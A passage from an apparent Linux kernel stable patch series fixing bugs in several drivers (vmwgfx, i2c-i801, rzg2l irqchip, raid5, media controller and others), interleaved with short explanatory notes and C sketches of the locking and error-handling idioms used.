+ 	res = vmw_context_cotable(ctx_node->ctx, vmw_so_cotables[so_type]);
+-	if (IS_ERR(res))
+-		return PTR_ERR(res);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	cmd = container_of(header, typeof(*cmd), header);
+ 	ret = vmw_cotable_notify(res, cmd->defined_id);
+ 
+@@ -2682,6 +2686,8 @@ static int vmw_cmd_dx_define_shader(struct vmw_private *dev_priv,
+ 		return -EINVAL;
+ 
+ 	res = vmw_context_cotable(ctx_node->ctx, SVGA_COTABLE_DXSHADER);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	ret = vmw_cotable_notify(res, cmd->body.shaderId);
+ 	if (ret)
+ 		return ret;
+@@ -3003,6 +3009,8 @@ static int vmw_cmd_dx_define_streamoutput(struct vmw_private *dev_priv,
+ 	}
+ 
+ 	res = vmw_context_cotable(ctx_node->ctx, SVGA_COTABLE_STREAMOUTPUT);
++	if (IS_ERR_OR_NULL(res))
++		return res ? PTR_ERR(res) : -EINVAL;
+ 	ret = vmw_cotable_notify(res, cmd->body.soid);
+ 	if (ret)
+ 		return ret;
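
The vmwgfx hunks repeat one idiom: vmw_context_cotable() may evidently yield a valid pointer, an ERR_PTR()-encoded errno, or NULL, and `res ? PTR_ERR(res) : -EINVAL` folds the last two cases into a single error code. A self-contained sketch of that idiom; the ERR_PTR helpers below are simplified re-declarations for illustration, not the kernel's exact definitions:

#include <errno.h>
#include <stdio.h>

#define MAX_ERRNO 4095

static inline void *ERR_PTR(long err) { return (void *)err; }
static inline long PTR_ERR(const void *p) { return (long)p; }
static inline int IS_ERR(const void *p)
{
	return (unsigned long)p >= (unsigned long)-MAX_ERRNO;
}
static inline int IS_ERR_OR_NULL(const void *p) { return !p || IS_ERR(p); }

/* Fold "NULL or ERR_PTR" into a single -errno, as the hunks above do. */
static int use_cotable(void *res)
{
	if (IS_ERR_OR_NULL(res))
		return res ? (int)PTR_ERR(res) : -EINVAL;
	return 0;                       /* valid pointer, carry on */
}

int main(void)
{
	int dummy = 0;

	printf("%d %d %d\n",
	       use_cotable(NULL),               /* -EINVAL */
	       use_cotable(ERR_PTR(-ENOMEM)),   /* -ENOMEM */
	       use_cotable(&dummy));            /* 0 */
	return 0;
}
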
+diff --git a/drivers/hwmon/amc6821.c b/drivers/hwmon/amc6821.c
+index 3bfd12ff4b3ca..6868db4ac84f3 100644
+--- a/drivers/hwmon/amc6821.c
++++ b/drivers/hwmon/amc6821.c
+@@ -934,10 +934,21 @@ static const struct i2c_device_id amc6821_id[] = {
+ 
+ MODULE_DEVICE_TABLE(i2c, amc6821_id);
+ 
++static const struct of_device_id __maybe_unused amc6821_of_match[] = {
++	{
++		.compatible = "ti,amc6821",
++		.data = (void *)amc6821,
++	},
++	{ }
++};
++
++MODULE_DEVICE_TABLE(of, amc6821_of_match);
++
+ static struct i2c_driver amc6821_driver = {
+ 	.class = I2C_CLASS_HWMON,
+ 	.driver = {
+ 		.name	= "amc6821",
++		.of_match_table = of_match_ptr(amc6821_of_match),
+ 	},
+ 	.probe_new = amc6821_probe,
+ 	.id_table = amc6821_id,
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 9a4e9bf304c28..1c970842624ba 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -1422,7 +1422,6 @@ static void i801_add_mux(struct i801_priv *priv)
+ 		lookup->table[i] = GPIO_LOOKUP(mux_config->gpio_chip,
+ 					       mux_config->gpios[i], "mux", 0);
+ 	gpiod_add_lookup_table(lookup);
+-	priv->lookup = lookup;
+ 
+ 	/*
+ 	 * Register the mux device, we use PLATFORM_DEVID_NONE here
+@@ -1436,7 +1435,10 @@ static void i801_add_mux(struct i801_priv *priv)
+ 				sizeof(struct i2c_mux_gpio_platform_data));
+ 	if (IS_ERR(priv->mux_pdev)) {
+ 		gpiod_remove_lookup_table(lookup);
++		devm_kfree(dev, lookup);
+ 		dev_err(dev, "Failed to register i2c-mux-gpio device\n");
++	} else {
++		priv->lookup = lookup;
+ 	}
+ }
+ 
+diff --git a/drivers/iio/accel/adxl367.c b/drivers/iio/accel/adxl367.c
+index 7c7d780407937..f1a41b92543af 100644
+--- a/drivers/iio/accel/adxl367.c
++++ b/drivers/iio/accel/adxl367.c
+@@ -1444,9 +1444,11 @@ static int adxl367_verify_devid(struct adxl367_state *st)
+ 	unsigned int val;
+ 	int ret;
+ 
+-	ret = regmap_read_poll_timeout(st->regmap, ADXL367_REG_DEVID, val,
+-				       val == ADXL367_DEVID_AD, 1000, 10000);
++	ret = regmap_read(st->regmap, ADXL367_REG_DEVID, &val);
+ 	if (ret)
++		return dev_err_probe(st->dev, ret, "Failed to read dev id\n");
++
++	if (val != ADXL367_DEVID_AD)
+ 		return dev_err_probe(st->dev, -ENODEV,
+ 				     "Invalid dev id 0x%02X, expected 0x%02X\n",
+ 				     val, ADXL367_DEVID_AD);
+@@ -1543,6 +1545,8 @@ int adxl367_probe(struct device *dev, const struct adxl367_ops *ops,
+ 	if (ret)
+ 		return ret;
+ 
++	fsleep(15000);
++
+ 	ret = adxl367_verify_devid(st);
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/iio/accel/adxl367_i2c.c b/drivers/iio/accel/adxl367_i2c.c
+index 3606efa25835e..5c040915276d1 100644
+--- a/drivers/iio/accel/adxl367_i2c.c
++++ b/drivers/iio/accel/adxl367_i2c.c
+@@ -11,7 +11,7 @@
+ 
+ #include "adxl367.h"
+ 
+-#define ADXL367_I2C_FIFO_DATA	0x42
++#define ADXL367_I2C_FIFO_DATA	0x18
+ 
+ struct adxl367_i2c_state {
+ 	struct regmap *regmap;
+diff --git a/drivers/iommu/dma-iommu.c b/drivers/iommu/dma-iommu.c
+index aa6d62cc567ae..3fa66dba0a326 100644
+--- a/drivers/iommu/dma-iommu.c
++++ b/drivers/iommu/dma-iommu.c
+@@ -1547,6 +1547,14 @@ static size_t iommu_dma_opt_mapping_size(void)
+ 	return iova_rcache_range();
+ }
+ 
++static size_t iommu_dma_max_mapping_size(struct device *dev)
++{
++	if (dev_is_untrusted(dev))
++		return swiotlb_max_mapping_size(dev);
++
++	return SIZE_MAX;
++}
++
+ static const struct dma_map_ops iommu_dma_ops = {
+ 	.flags			= DMA_F_PCI_P2PDMA_SUPPORTED,
+ 	.alloc			= iommu_dma_alloc,
+@@ -1569,6 +1577,7 @@ static const struct dma_map_ops iommu_dma_ops = {
+ 	.unmap_resource		= iommu_dma_unmap_resource,
+ 	.get_merge_boundary	= iommu_dma_get_merge_boundary,
+ 	.opt_mapping_size	= iommu_dma_opt_mapping_size,
++	.max_mapping_size       = iommu_dma_max_mapping_size,
+ };
+ 
+ /*
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 8b38972394776..83736824f17d1 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -1741,6 +1741,9 @@ static void probe_alloc_default_domain(struct bus_type *bus,
+ {
+ 	struct __group_domain_type gtype;
+ 
++	if (group->default_domain)
++		return;
++
+ 	memset(&gtype, 0, sizeof(gtype));
+ 
+ 	/* Ask for default domain requirements of all devices in the group */
+diff --git a/drivers/irqchip/irq-renesas-rzg2l.c b/drivers/irqchip/irq-renesas-rzg2l.c
+index 10c3e85c90c23..be71459c7465a 100644
+--- a/drivers/irqchip/irq-renesas-rzg2l.c
++++ b/drivers/irqchip/irq-renesas-rzg2l.c
+@@ -28,8 +28,7 @@
+ #define ISCR				0x10
+ #define IITSR				0x14
+ #define TSCR				0x20
+-#define TITSR0				0x24
+-#define TITSR1				0x28
++#define TITSR(n)			(0x24 + (n) * 4)
+ #define TITSR0_MAX_INT			16
+ #define TITSEL_WIDTH			0x2
+ #define TSSR(n)				(0x30 + ((n) * 4))
+@@ -67,28 +66,43 @@ static struct rzg2l_irqc_priv *irq_data_to_priv(struct irq_data *data)
+ 	return data->domain->host_data;
+ }
+ 
+-static void rzg2l_irq_eoi(struct irq_data *d)
++static void rzg2l_clear_irq_int(struct rzg2l_irqc_priv *priv, unsigned int hwirq)
+ {
+-	unsigned int hw_irq = irqd_to_hwirq(d) - IRQC_IRQ_START;
+-	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
++	unsigned int hw_irq = hwirq - IRQC_IRQ_START;
+ 	u32 bit = BIT(hw_irq);
+-	u32 reg;
++	u32 iitsr, iscr;
+ 
+-	reg = readl_relaxed(priv->base + ISCR);
+-	if (reg & bit)
+-		writel_relaxed(reg & ~bit, priv->base + ISCR);
++	iscr = readl_relaxed(priv->base + ISCR);
++	iitsr = readl_relaxed(priv->base + IITSR);
++
++	/*
++	 * ISCR can only be cleared if the type is falling-edge, rising-edge or
++	 * falling/rising-edge.
++	 */
++	if ((iscr & bit) && (iitsr & IITSR_IITSEL_MASK(hw_irq))) {
++		writel_relaxed(iscr & ~bit, priv->base + ISCR);
++		/*
++		 * Enforce that the posted write is flushed to prevent the
++		 * just-handled interrupt from being raised again.
++		 */
++		readl_relaxed(priv->base + ISCR);
++	}
+ }
+ 
+-static void rzg2l_tint_eoi(struct irq_data *d)
++static void rzg2l_clear_tint_int(struct rzg2l_irqc_priv *priv, unsigned int hwirq)
+ {
+-	unsigned int hw_irq = irqd_to_hwirq(d) - IRQC_TINT_START;
+-	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
+-	u32 bit = BIT(hw_irq);
++	u32 bit = BIT(hwirq - IRQC_TINT_START);
+ 	u32 reg;
+ 
+ 	reg = readl_relaxed(priv->base + TSCR);
+-	if (reg & bit)
++	if (reg & bit) {
+ 		writel_relaxed(reg & ~bit, priv->base + TSCR);
++		/*
++		 * Enforce that the posted write is flushed to prevent the
++		 * just-handled interrupt from being raised again.
++		 */
++		readl_relaxed(priv->base + TSCR);
++	}
+ }
+ 
+ static void rzg2l_irqc_eoi(struct irq_data *d)
+@@ -98,9 +112,9 @@ static void rzg2l_irqc_eoi(struct irq_data *d)
+ 
+ 	raw_spin_lock(&priv->lock);
+ 	if (hw_irq >= IRQC_IRQ_START && hw_irq <= IRQC_IRQ_COUNT)
+-		rzg2l_irq_eoi(d);
++		rzg2l_clear_irq_int(priv, hw_irq);
+ 	else if (hw_irq >= IRQC_TINT_START && hw_irq < IRQC_NUM_IRQ)
+-		rzg2l_tint_eoi(d);
++		rzg2l_clear_tint_int(priv, hw_irq);
+ 	raw_spin_unlock(&priv->lock);
+ 	irq_chip_eoi_parent(d);
+ }
+@@ -148,8 +162,10 @@ static void rzg2l_irqc_irq_enable(struct irq_data *d)
+ 
+ static int rzg2l_irq_set_type(struct irq_data *d, unsigned int type)
+ {
+-	unsigned int hw_irq = irqd_to_hwirq(d) - IRQC_IRQ_START;
+ 	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
++	unsigned int hwirq = irqd_to_hwirq(d);
++	u32 iitseln = hwirq - IRQC_IRQ_START;
++	bool clear_irq_int = false;
+ 	u16 sense, tmp;
+ 
+ 	switch (type & IRQ_TYPE_SENSE_MASK) {
+@@ -159,14 +175,17 @@ static int rzg2l_irq_set_type(struct irq_data *d, unsigned int type)
+ 
+ 	case IRQ_TYPE_EDGE_FALLING:
+ 		sense = IITSR_IITSEL_EDGE_FALLING;
++		clear_irq_int = true;
+ 		break;
+ 
+ 	case IRQ_TYPE_EDGE_RISING:
+ 		sense = IITSR_IITSEL_EDGE_RISING;
++		clear_irq_int = true;
+ 		break;
+ 
+ 	case IRQ_TYPE_EDGE_BOTH:
+ 		sense = IITSR_IITSEL_EDGE_BOTH;
++		clear_irq_int = true;
+ 		break;
+ 
+ 	default:
+@@ -175,22 +194,40 @@ static int rzg2l_irq_set_type(struct irq_data *d, unsigned int type)
+ 
+ 	raw_spin_lock(&priv->lock);
+ 	tmp = readl_relaxed(priv->base + IITSR);
+-	tmp &= ~IITSR_IITSEL_MASK(hw_irq);
+-	tmp |= IITSR_IITSEL(hw_irq, sense);
++	tmp &= ~IITSR_IITSEL_MASK(iitseln);
++	tmp |= IITSR_IITSEL(iitseln, sense);
++	if (clear_irq_int)
++		rzg2l_clear_irq_int(priv, hwirq);
+ 	writel_relaxed(tmp, priv->base + IITSR);
+ 	raw_spin_unlock(&priv->lock);
+ 
+ 	return 0;
+ }
+ 
++static u32 rzg2l_disable_tint_and_set_tint_source(struct irq_data *d, struct rzg2l_irqc_priv *priv,
++						  u32 reg, u32 tssr_offset, u8 tssr_index)
++{
++	u32 tint = (u32)(uintptr_t)irq_data_get_irq_chip_data(d);
++	u32 tien = reg & (TIEN << TSSEL_SHIFT(tssr_offset));
++
++	/* Clear the relevant byte in reg */
++	reg &= ~(TSSEL_MASK << TSSEL_SHIFT(tssr_offset));
++	/* Set TINT and leave TIEN clear */
++	reg |= tint << TSSEL_SHIFT(tssr_offset);
++	writel_relaxed(reg, priv->base + TSSR(tssr_index));
++
++	return reg | tien;
++}
++
+ static int rzg2l_tint_set_edge(struct irq_data *d, unsigned int type)
+ {
+ 	struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
+ 	unsigned int hwirq = irqd_to_hwirq(d);
+ 	u32 titseln = hwirq - IRQC_TINT_START;
+-	u32 offset;
+-	u8 sense;
+-	u32 reg;
++	u32 tssr_offset = TSSR_OFFSET(titseln);
++	u8 tssr_index = TSSR_INDEX(titseln);
++	u8 index, sense;
++	u32 reg, tssr;
+ 
+ 	switch (type & IRQ_TYPE_SENSE_MASK) {
+ 	case IRQ_TYPE_EDGE_RISING:
+@@ -205,17 +242,21 @@ static int rzg2l_tint_set_edge(struct irq_data *d, unsigned int type)
+ 		return -EINVAL;
+ 	}
+ 
+-	offset = TITSR0;
++	index = 0;
+ 	if (titseln >= TITSR0_MAX_INT) {
+ 		titseln -= TITSR0_MAX_INT;
+-		offset = TITSR1;
++		index = 1;
+ 	}
+ 
+ 	raw_spin_lock(&priv->lock);
+-	reg = readl_relaxed(priv->base + offset);
++	tssr = readl_relaxed(priv->base + TSSR(tssr_index));
++	tssr = rzg2l_disable_tint_and_set_tint_source(d, priv, tssr, tssr_offset, tssr_index);
++	reg = readl_relaxed(priv->base + TITSR(index));
+ 	reg &= ~(IRQ_MASK << (titseln * TITSEL_WIDTH));
+ 	reg |= sense << (titseln * TITSEL_WIDTH);
+-	writel_relaxed(reg, priv->base + offset);
++	writel_relaxed(reg, priv->base + TITSR(index));
++	rzg2l_clear_tint_int(priv, hwirq);
++	writel_relaxed(tssr, priv->base + TSSR(tssr_index));
+ 	raw_spin_unlock(&priv->lock);
+ 
+ 	return 0;
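
The read-back that both clear helpers above add after writel_relaxed() is the standard cure for posted MMIO writes: the store can linger in a write buffer, so reading the same register back forces it to complete before the handler returns and the line can retrigger. A compile-and-run sketch of the pattern over a volatile pointer standing in for an ioremap()ed register (the register layout is invented):

#include <stdint.h>

/*
 * `reg` stands in for an ioremap()ed register; volatile models the
 * readl_relaxed()/writel_relaxed() accessors.
 */
static void clear_status_and_flush(volatile uint32_t *reg, uint32_t bit)
{
	uint32_t val = *reg;            /* readl_relaxed() */

	if (val & bit) {
		*reg = val & ~bit;      /* writel_relaxed() */
		(void)*reg;             /* read back: the posted write must
					 * reach the device before we return */
	}
}

int main(void)
{
	uint32_t fake_reg = 0x4;        /* status bit 2 pending */

	clear_status_and_flush(&fake_reg, 0x4);
	return (int)fake_reg;           /* 0 after the clear */
}
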
+diff --git a/drivers/md/dm-raid.c b/drivers/md/dm-raid.c
+index bf833ca880bc1..99b4738e867a8 100644
+--- a/drivers/md/dm-raid.c
++++ b/drivers/md/dm-raid.c
+@@ -4046,7 +4046,9 @@ static void raid_resume(struct dm_target *ti)
+ 		 * Take this opportunity to check whether any failed
+ 		 * devices are reachable again.
+ 		 */
++		mddev_lock_nointr(mddev);
+ 		attempt_restore_of_faulty_devices(rs);
++		mddev_unlock(mddev);
+ 	}
+ 
+ 	if (test_and_clear_bit(RT_FLAG_RS_SUSPENDED, &rs->runtime_flags)) {
+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index b748901a4fb55..1c601508ce0b4 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -679,8 +679,10 @@ static void dm_exception_table_exit(struct dm_exception_table *et,
+ 	for (i = 0; i < size; i++) {
+ 		slot = et->table + i;
+ 
+-		hlist_bl_for_each_entry_safe(ex, pos, n, slot, hash_list)
++		hlist_bl_for_each_entry_safe(ex, pos, n, slot, hash_list) {
+ 			kmem_cache_free(mem, ex);
++			cond_resched();
++		}
+ 	}
+ 
+ 	kvfree(et->table);
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index e4564ca1f2434..8cf2317857e0a 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -2420,7 +2420,7 @@ static int grow_one_stripe(struct r5conf *conf, gfp_t gfp)
+ 	atomic_inc(&conf->active_stripes);
+ 
+ 	raid5_release_stripe(sh);
+-	conf->max_nr_stripes++;
++	WRITE_ONCE(conf->max_nr_stripes, conf->max_nr_stripes + 1);
+ 	return 1;
+ }
+ 
+@@ -2717,7 +2717,7 @@ static int drop_one_stripe(struct r5conf *conf)
+ 	shrink_buffers(sh);
+ 	free_stripe(conf->slab_cache, sh);
+ 	atomic_dec(&conf->active_stripes);
+-	conf->max_nr_stripes--;
++	WRITE_ONCE(conf->max_nr_stripes, conf->max_nr_stripes - 1);
+ 	return 1;
+ }
+ 
+@@ -6891,7 +6891,7 @@ raid5_set_cache_size(struct mddev *mddev, int size)
+ 	if (size <= 16 || size > 32768)
+ 		return -EINVAL;
+ 
+-	conf->min_nr_stripes = size;
++	WRITE_ONCE(conf->min_nr_stripes, size);
+ 	mutex_lock(&conf->cache_size_mutex);
+ 	while (size < conf->max_nr_stripes &&
+ 	       drop_one_stripe(conf))
+@@ -6903,7 +6903,7 @@ raid5_set_cache_size(struct mddev *mddev, int size)
+ 	mutex_lock(&conf->cache_size_mutex);
+ 	while (size > conf->max_nr_stripes)
+ 		if (!grow_one_stripe(conf, GFP_KERNEL)) {
+-			conf->min_nr_stripes = conf->max_nr_stripes;
++			WRITE_ONCE(conf->min_nr_stripes, conf->max_nr_stripes);
+ 			result = -ENOMEM;
+ 			break;
+ 		}
+@@ -7468,11 +7468,13 @@ static unsigned long raid5_cache_count(struct shrinker *shrink,
+ 				       struct shrink_control *sc)
+ {
+ 	struct r5conf *conf = container_of(shrink, struct r5conf, shrinker);
++	int max_stripes = READ_ONCE(conf->max_nr_stripes);
++	int min_stripes = READ_ONCE(conf->min_nr_stripes);
+ 
+-	if (conf->max_nr_stripes < conf->min_nr_stripes)
++	if (max_stripes < min_stripes)
+ 		/* unlikely, but not impossible */
+ 		return 0;
+-	return conf->max_nr_stripes - conf->min_nr_stripes;
++	return max_stripes - min_stripes;
+ }
+ 
+ static struct r5conf *setup_conf(struct mddev *mddev)
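
The raid5 hunks annotate max_nr_stripes/min_nr_stripes with WRITE_ONCE()/READ_ONCE() because the shrinker's count callback reads both fields without holding cache_size_mutex; the annotations make the unlocked reads tear-free and stop the compiler from caching or re-reading them. A minimal userspace rendition, with simplified stand-ins for the two kernel macros:

#include <stdio.h>

/* simplified stand-ins for the kernel macros */
#define WRITE_ONCE(x, val) (*(volatile __typeof__(x) *)&(x) = (val))
#define READ_ONCE(x)       (*(volatile __typeof__(x) *)&(x))

static int max_nr_stripes = 256;        /* written under the mutex */
static int min_nr_stripes = 256;        /* written under the mutex */

/* Lockless reader, shaped like raid5_cache_count() after the fix:
 * snapshot each field exactly once, then reason about the snapshots. */
static long cache_count(void)
{
	int max = READ_ONCE(max_nr_stripes);
	int min = READ_ONCE(min_nr_stripes);

	if (max < min)                  /* unlikely, but not impossible */
		return 0;
	return max - min;
}

int main(void)
{
	WRITE_ONCE(min_nr_stripes, 128);        /* writer side */
	printf("%ld\n", cache_count());         /* prints 128 */
	return 0;
}
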
+diff --git a/drivers/media/mc/mc-entity.c b/drivers/media/mc/mc-entity.c
+index f268cf66053e1..8919df09e3e8d 100644
+--- a/drivers/media/mc/mc-entity.c
++++ b/drivers/media/mc/mc-entity.c
+@@ -509,14 +509,15 @@ static int media_pipeline_walk_push(struct media_pipeline_walk *walk,
+ 
+ /*
+  * Move the top entry link cursor to the next link. If all links of the entry
+- * have been visited, pop the entry itself.
++ * have been visited, pop the entry itself. Return true if the entry has been
++ * popped.
+  */
+-static void media_pipeline_walk_pop(struct media_pipeline_walk *walk)
++static bool media_pipeline_walk_pop(struct media_pipeline_walk *walk)
+ {
+ 	struct media_pipeline_walk_entry *entry;
+ 
+ 	if (WARN_ON(walk->stack.top < 0))
+-		return;
++		return false;
+ 
+ 	entry = media_pipeline_walk_top(walk);
+ 
+@@ -526,7 +527,7 @@ static void media_pipeline_walk_pop(struct media_pipeline_walk *walk)
+ 			walk->stack.top);
+ 
+ 		walk->stack.top--;
+-		return;
++		return true;
+ 	}
+ 
+ 	entry->links = entry->links->next;
+@@ -534,6 +535,8 @@ static void media_pipeline_walk_pop(struct media_pipeline_walk *walk)
+ 	dev_dbg(walk->mdev->dev,
+ 		"media pipeline: moved entry %u to next link\n",
+ 		walk->stack.top);
++
++	return false;
+ }
+ 
+ /* Free all memory allocated while walking the pipeline. */
+@@ -579,30 +582,24 @@ static int media_pipeline_explore_next_link(struct media_pipeline *pipe,
+ 					    struct media_pipeline_walk *walk)
+ {
+ 	struct media_pipeline_walk_entry *entry = media_pipeline_walk_top(walk);
+-	struct media_pad *pad;
++	struct media_pad *origin;
+ 	struct media_link *link;
+ 	struct media_pad *local;
+ 	struct media_pad *remote;
++	bool last_link;
+ 	int ret;
+ 
+-	pad = entry->pad;
++	origin = entry->pad;
+ 	link = list_entry(entry->links, typeof(*link), list);
+-	media_pipeline_walk_pop(walk);
++	last_link = media_pipeline_walk_pop(walk);
+ 
+ 	dev_dbg(walk->mdev->dev,
+ 		"media pipeline: exploring link '%s':%u -> '%s':%u\n",
+ 		link->source->entity->name, link->source->index,
+ 		link->sink->entity->name, link->sink->index);
+ 
+-	/* Skip links that are not enabled. */
+-	if (!(link->flags & MEDIA_LNK_FL_ENABLED)) {
+-		dev_dbg(walk->mdev->dev,
+-			"media pipeline: skipping link (disabled)\n");
+-		return 0;
+-	}
+-
+ 	/* Get the local pad and remote pad. */
+-	if (link->source->entity == pad->entity) {
++	if (link->source->entity == origin->entity) {
+ 		local = link->source;
+ 		remote = link->sink;
+ 	} else {
+@@ -614,25 +611,64 @@ static int media_pipeline_explore_next_link(struct media_pipeline *pipe,
+ 	 * Skip links that originate from a different pad than the incoming pad
+ 	 * that is not connected internally in the entity to the incoming pad.
+ 	 */
+-	if (pad != local &&
+-	    !media_entity_has_pad_interdep(pad->entity, pad->index, local->index)) {
++	if (origin != local &&
++	    !media_entity_has_pad_interdep(origin->entity, origin->index,
++					   local->index)) {
+ 		dev_dbg(walk->mdev->dev,
+ 			"media pipeline: skipping link (no route)\n");
+-		return 0;
++		goto done;
+ 	}
+ 
+ 	/*
+-	 * Add the local and remote pads of the link to the pipeline and push
+-	 * them to the stack, if they're not already present.
++	 * Add the local pad of the link to the pipeline and push it to the
++	 * stack, if not already present.
+ 	 */
+ 	ret = media_pipeline_add_pad(pipe, walk, local);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Similarly, add the remote pad, but only if the link is enabled. */
++	if (!(link->flags & MEDIA_LNK_FL_ENABLED)) {
++		dev_dbg(walk->mdev->dev,
++			"media pipeline: skipping link (disabled)\n");
++		goto done;
++	}
++
+ 	ret = media_pipeline_add_pad(pipe, walk, remote);
+ 	if (ret)
+ 		return ret;
+ 
++done:
++	/*
++	 * If we're done iterating over links, iterate over pads of the entity.
++	 * This is necessary to discover pads that are not connected with any
++	 * link. Those are dead ends from a pipeline exploration point of view,
++	 * but are still part of the pipeline and need to be added to enable
++	 * proper validation.
++	 */
++	if (!last_link)
++		return 0;
++
++	dev_dbg(walk->mdev->dev,
++		"media pipeline: adding unconnected pads of '%s'\n",
++		local->entity->name);
++
++	media_entity_for_each_pad(origin->entity, local) {
++		/*
++		 * Skip the origin pad (already handled), pads that have links
++		 * (already discovered through iterating over links) and pads
++		 * not internally connected.
++		 */
++		if (origin == local || !local->num_links ||
++		    !media_entity_has_pad_interdep(origin->entity, origin->index,
++						   local->index))
++			continue;
++
++		ret = media_pipeline_add_pad(pipe, walk, local);
++		if (ret)
++			return ret;
++	}
++
+ 	return 0;
+ }
+ 
+@@ -744,7 +780,6 @@ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 		struct media_pad *pad = ppad->pad;
+ 		struct media_entity *entity = pad->entity;
+ 		bool has_enabled_link = false;
+-		bool has_link = false;
+ 		struct media_link *link;
+ 
+ 		dev_dbg(mdev->dev, "Validating pad '%s':%u\n", pad->entity->name,
+@@ -774,7 +809,6 @@ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 			/* Record if the pad has links and enabled links. */
+ 			if (link->flags & MEDIA_LNK_FL_ENABLED)
+ 				has_enabled_link = true;
+-			has_link = true;
+ 
+ 			/*
+ 			 * Validate the link if it's enabled and has the
+@@ -812,7 +846,7 @@ __must_check int __media_pipeline_start(struct media_pad *pad,
+ 		 * 3. If the pad has the MEDIA_PAD_FL_MUST_CONNECT flag set,
+ 		 * ensure that it has either no link or an enabled link.
+ 		 */
+-		if ((pad->flags & MEDIA_PAD_FL_MUST_CONNECT) && has_link &&
++		if ((pad->flags & MEDIA_PAD_FL_MUST_CONNECT) &&
+ 		    !has_enabled_link) {
+ 			dev_dbg(mdev->dev,
+ 				"Pad '%s':%u must be connected by an enabled link\n",
+@@ -957,6 +991,9 @@ static void __media_entity_remove_link(struct media_entity *entity,
+ 
+ 	/* Remove the reverse links for a data link. */
+ 	if ((link->flags & MEDIA_LNK_FL_LINK_TYPE) == MEDIA_LNK_FL_DATA_LINK) {
++		link->source->num_links--;
++		link->sink->num_links--;
++
+ 		if (link->source->entity == entity)
+ 			remote = link->sink->entity;
+ 		else
+@@ -1017,6 +1054,11 @@ media_create_pad_link(struct media_entity *source, u16 source_pad,
+ 	struct media_link *link;
+ 	struct media_link *backlink;
+ 
++	if (flags & MEDIA_LNK_FL_LINK_TYPE)
++		return -EINVAL;
++
++	flags |= MEDIA_LNK_FL_DATA_LINK;
++
+ 	if (WARN_ON(!source || !sink) ||
+ 	    WARN_ON(source_pad >= source->num_pads) ||
+ 	    WARN_ON(sink_pad >= sink->num_pads))
+@@ -1032,7 +1074,7 @@ media_create_pad_link(struct media_entity *source, u16 source_pad,
+ 
+ 	link->source = &source->pads[source_pad];
+ 	link->sink = &sink->pads[sink_pad];
+-	link->flags = flags & ~MEDIA_LNK_FL_INTERFACE_LINK;
++	link->flags = flags;
+ 
+ 	/* Initialize graph object embedded at the new link */
+ 	media_gobj_create(source->graph_obj.mdev, MEDIA_GRAPH_LINK,
+@@ -1063,6 +1105,9 @@ media_create_pad_link(struct media_entity *source, u16 source_pad,
+ 	sink->num_links++;
+ 	source->num_links++;
+ 
++	link->source->num_links++;
++	link->sink->num_links++;
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(media_create_pad_link);
+diff --git a/drivers/media/tuners/xc4000.c b/drivers/media/tuners/xc4000.c
+index 57ded9ff3f043..29bc63021c5aa 100644
+--- a/drivers/media/tuners/xc4000.c
++++ b/drivers/media/tuners/xc4000.c
+@@ -1515,10 +1515,10 @@ static int xc4000_get_frequency(struct dvb_frontend *fe, u32 *freq)
+ {
+ 	struct xc4000_priv *priv = fe->tuner_priv;
+ 
++	mutex_lock(&priv->lock);
+ 	*freq = priv->freq_hz + priv->freq_offset;
+ 
+ 	if (debug) {
+-		mutex_lock(&priv->lock);
+ 		if ((priv->cur_fw.type
+ 		     & (BASE | FM | DTV6 | DTV7 | DTV78 | DTV8)) == BASE) {
+ 			u16	snr = 0;
+@@ -1529,8 +1529,8 @@ static int xc4000_get_frequency(struct dvb_frontend *fe, u32 *freq)
+ 				return 0;
+ 			}
+ 		}
+-		mutex_unlock(&priv->lock);
+ 	}
++	mutex_unlock(&priv->lock);
+ 
+ 	dprintk(1, "%s()\n", __func__);
+ 
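
The xc4000 change is a lock-scope fix: freq_hz and freq_offset are written together under priv->lock, so summing them outside the lock can observe a half-updated pair; the fix pulls the read inside the existing critical section. The same shape with POSIX threads (field names and values invented):

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned int freq_hz = 474000000;
static unsigned int freq_offset = 1250000;

/* Both fields are updated together under `lock` elsewhere, so the sum
 * must also be formed under `lock`, as in the fixed get_frequency(). */
static unsigned int get_frequency(void)
{
	unsigned int freq;

	pthread_mutex_lock(&lock);
	freq = freq_hz + freq_offset;
	pthread_mutex_unlock(&lock);

	return freq;
}

int main(void)
{
	printf("%u Hz\n", get_frequency());
	return 0;
}
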
+diff --git a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+index fdec2c30eb165..63c717053e36b 100644
+--- a/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
++++ b/drivers/misc/lis3lv02d/lis3lv02d_i2c.c
+@@ -199,8 +199,14 @@ static int lis3lv02d_i2c_suspend(struct device *dev)
+ 	struct i2c_client *client = to_i2c_client(dev);
+ 	struct lis3lv02d *lis3 = i2c_get_clientdata(client);
+ 
+-	if (!lis3->pdata || !lis3->pdata->wakeup_flags)
++	/* Turn on for wakeup if turned off by runtime suspend */
++	if (lis3->pdata && lis3->pdata->wakeup_flags) {
++		if (pm_runtime_suspended(dev))
++			lis3lv02d_poweron(lis3);
